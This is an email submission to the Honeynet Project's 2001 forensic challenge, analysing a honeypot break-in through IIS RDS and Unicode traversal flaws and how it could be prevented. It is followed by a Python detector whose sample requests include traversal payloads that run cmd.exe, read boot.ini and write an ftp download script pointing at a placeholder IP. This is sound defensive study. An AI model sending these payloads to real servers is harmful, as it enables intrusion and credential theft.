From jmluedtke@ucdavis.edu Fri Apr 20 20:32:16 2001
Date: Thu, 19 Apr 2001 17:53:24 -0700 (PDT)
From: Jessica Luedtke
To: project@honeynet.org
Subject: Scan of the Month - April

Thanks...this was an interesting exercise!

Jessica Luedtke

*******************

1. Exploits used to attack the system:

The exploits used were the IIS RDS vulnerability exploit[1] and the Extended Unicode directory traversal vulnerability[2]. The IIS RDS vulnerability allows an attacker to take advantage of the shell() VBA command to run arbitrary commands on the vulnerable box. The directory traversal vulnerability allows the attacker to view, modify, delete, or execute any file that is 1. on the same logical drive as any web-accessible file and 2. accessible by the groups the IUSR_machinename account is a member of (Everyone and Users by default).

2. How were the exploits used to access and control the system?

(Timestamps indicate the time of the start of that portion of the attack, according to the log)

02/04-05:25:22.525676 - After viewing the webpage and the guestbook page, the attacker attempted to exploit the directory traversal vulnerability to retrieve the file boot.ini. The attempt was successful. From this file, the attacker was able to determine the OS and several details about the system setup. The exploit used for directory traversal appears to be scripted, because the same four possible variations of the exploit were tried every time, in the same order, and all four variations were sent at the same time. However, based on the headers, the attacker appears to have used an ordinary web browser to perform the attack (the same browser he used to view the website, in fact). Interesting.

02/04-05:27:08.159193 - The attacker checked to see if the box was vulnerable to the IIS RDS vulnerability by checking for a directory named msadc, and the file msadcs.dll within that directory. Upon determining that they were indeed there, he ran an exploit against the vulnerability, creating a file named "fun" in the root directory of the C: drive. He utilized the directory traversal vulnerability to view this file, verifying that the exploit had worked. The particular exploit used appears to be msadc.pl, written by rain forest puppy, due to the signature MIME boundary of !ADM!ROX!YOUR!WORLD! and the similarity between the output of msadc.pl and the traffic from the attacker[3].

02/04-05:32:51.574859 - The attacker used the exploit to echo commands one line at a time into a file, creating an ftp script designed to connect to a remote server (nether.net, a provider of free shell accounts) and download several files. However, the account did not work (which he did not realize, as this exploit does not provide any feedback, so he was essentially working blindly). He attempted to run the password recovery program he had tried to download, and upload the results to the same ftp server.

02/04-05:34:47.612437 - When the previous attack did not work, the attacker attempted to download the files from an FTP server on his own computer, after verifying that he could connect to it. However, this did not work because he used > instead of >> when writing the second line of the script, overwriting the file instead of appending to it.

02/04-05:38:27.521384 - The attacker rewrote the ftp script again and tried a third server, which failed because he forgot to echo the first command he was attempting to run to the ftp script.

02/04-05:40:11.229519 - The attacker tried once again to connect to the FTP server on his computer. At this point, he appeared to be either confused or experimenting, as he made several mistakes, and was again unsuccessful.

02/04-05:41:03.136533 - The attacker gave up on the IIS RDS vulnerability, and tried writing and executing the script via the directory traversal vulnerability. This time he got everything correct, and it worked. He connected to the FTP server running on his computer and downloaded the files.

3. What was done once access was gained?

Based on a web search for the file names, the files downloaded appear to most likely be a password recovery program (pdump.exe and samdump.dll) and a program which allows remote connections from a specific IP address (nc.exe). This would allow for the possibility of further control over the computer, and/or compromised passwords.

4. How could this attack have been prevented?

Solutions are available to both vulnerabilities. A patch for the directory traversal attack can be obtained from Microsoft[4]. The RDS vulnerability can be fixed by either removing the MDAC capabilities entirely, upgrading to a newer version, restricting access to the directory, or filtering incoming requests.

5. How much time did you spend on this analysis and writeup?

Approximately 5 hours.

Bonus: Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not?

The site compromised was rain forest puppy's, and he was involved in the research and development for both vulnerabilities exploited in this attack. Even if the attacker did not make that connection, the website is obviously security oriented, and the attacker apparently viewed it with an ordinary web browser before performing the attack. Therefore, it's quite likely that the attacker realized when his attack succeeded (if not before) that the box was a honeypot, as there would be no other likely reason for a box run by someone who knows about the exploit and is concerned about security to be vulnerable to it.

References:
[1] http://www.securityfocus.com/bid/529
[2] http://www.securityfocus.com/bid/1806
[3] http://www.securityfocus.com/data/vulnerabilities/exploits/msadc.pl
[4] http://www.microsoft.com/technet/security/bulletin/ms00-057.asp
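The submission above identifies the attack by three traits visible on the wire: overlong UTF-8 encodings of "/" and "\" (%c0%af, %c1%9c) that carry "../" past IIS's canonicalization check, requests for /msadc/msadcs.dll, and the !ADM!ROX!YOUR!WORLD! MIME boundary of msadc.pl. The following Python is an added detection example written for this page; it is not part of the submission, the honeynet capture, or msadc.pl. It decodes request paths the lenient way a vulnerable IIS did (accepting overlong sequences), checks whether the canonical path escapes the web root, and tags the RDS probe, the msadc.pl boundary, and echo-redirection used to stage an ftp script. The request lines in SAMPLE_REQUESTS are constructed to mirror the stages described in the write-up, not copied from the capture, and the finding labels are this example's own naming.

```python
"""Detection of the IIS Unicode traversal and RDS/msadc.pl patterns described in the
Scan of the Month write-up.  Added example; the request lines below are constructed,
not taken from the honeynet capture."""
import re
from typing import Dict, List, Tuple

PERCENT = re.compile(rb"%([0-9A-Fa-f]{2})")
# %c0xx / %c1xx / %e0%80xx followed by a continuation byte: overlong UTF-8 forms
# that decode to ASCII (e.g. %c0%af -> '/', %c1%9c -> '\').
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]|%e0%80%[89ab][0-9a-f]", re.I)
MSADC_BOUNDARY = b"!ADM!ROX!YOUR!WORLD!"   # MIME boundary used by rain forest puppy's msadc.pl


def percent_decode(raw: str) -> bytes:
    """Turn %XX escapes into raw bytes without interpreting them as UTF-8 yet."""
    return PERCENT.sub(lambda m: bytes([int(m.group(1), 16)]), raw.encode("latin-1"))


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 the way the vulnerable IIS decoder did: overlong two- and
    three-byte sequences are accepted, so C0 AF becomes '/' and C1 9C becomes '\\'.
    A strict decoder would reject these; accepting them is exactly the bug."""
    out, i, n = [], 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < n and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))); i += 2
        elif 0xE0 <= b <= 0xEF and i + 2 < n and all(0x80 <= x <= 0xBF for x in data[i + 1:i + 3]):
            cp = ((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)
            out.append(chr(cp)); i += 3
        else:
            out.append("\ufffd"); i += 1
    return "".join(out)


def canonicalize(uri: str) -> str:
    """Path component of the URI, percent- and lenient-UTF-8-decoded, with '\\' folded to '/'."""
    path = uri.split("?", 1)[0]
    return lenient_utf8_decode(percent_decode(path)).replace("\\", "/")


def escapes_root(path: str) -> bool:
    """True if walking the segments ever climbs above the web root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def classify(request_line: str, body: bytes = b"") -> List[str]:
    """Return the findings for one HTTP request line (plus optional body)."""
    try:
        method, uri, _version = request_line.split(" ", 2)
    except ValueError:
        return ["malformed-request-line"]
    path = canonicalize(uri)
    query = uri.split("?", 1)[1] if "?" in uri else ""
    findings: List[str] = []
    if OVERLONG.search(uri):
        findings.append("overlong-utf8")
    if escapes_root(path):
        findings.append("directory-traversal")
    if path.lower().endswith("cmd.exe"):
        findings.append("cmd-exec")
        # "echo ... >" or ">>" through cmd.exe: building a file (here, an ftp script) one line at a time
        if re.search(r"echo\+.*>", query, re.I):
            findings.append("file-write-via-echo")
    if path.lower().startswith("/msadc/msadcs.dll"):
        findings.append("rds-probe" if method == "GET" else "rds-request")
    if MSADC_BOUNDARY in body:
        findings.append("msadc.pl-signature")
    return findings


# Constructed requests mirroring the stages in the write-up (not from the capture).
SAMPLE_REQUESTS: List[Tuple[str, bytes]] = [
    ("GET /index.html HTTP/1.0", b""),
    ("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+type+c:\\boot.ini HTTP/1.0", b""),
    ("GET /msadc/msadcs.dll HTTP/1.0", b""),
    ("POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.0",
     b"--!ADM!ROX!YOUR!WORLD!\r\nContent-Type: application/x-varg\r\n"),
    ("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+open+192.0.2.10+>>c:\\ftp.txt HTTP/1.0", b""),
]


def run_samples() -> Dict[str, List[str]]:
    """Classify every constructed request; keyed by request line."""
    return {line: classify(line, body) for line, body in SAMPLE_REQUESTS}


if __name__ == "__main__":
    for line, findings in run_samples().items():
        print(f"{findings or ['clean']}  {line}")
```

The canonicalization step is the point: a filter that inspects the raw URI for "../" or "%2e%2e" never sees the traversal, because the "/" arrives as %c0%af. Decoding with the same permissiveness as the target, then checking the depth of the resulting path, catches the request regardless of which of the four encoding variants the attacker's script tried.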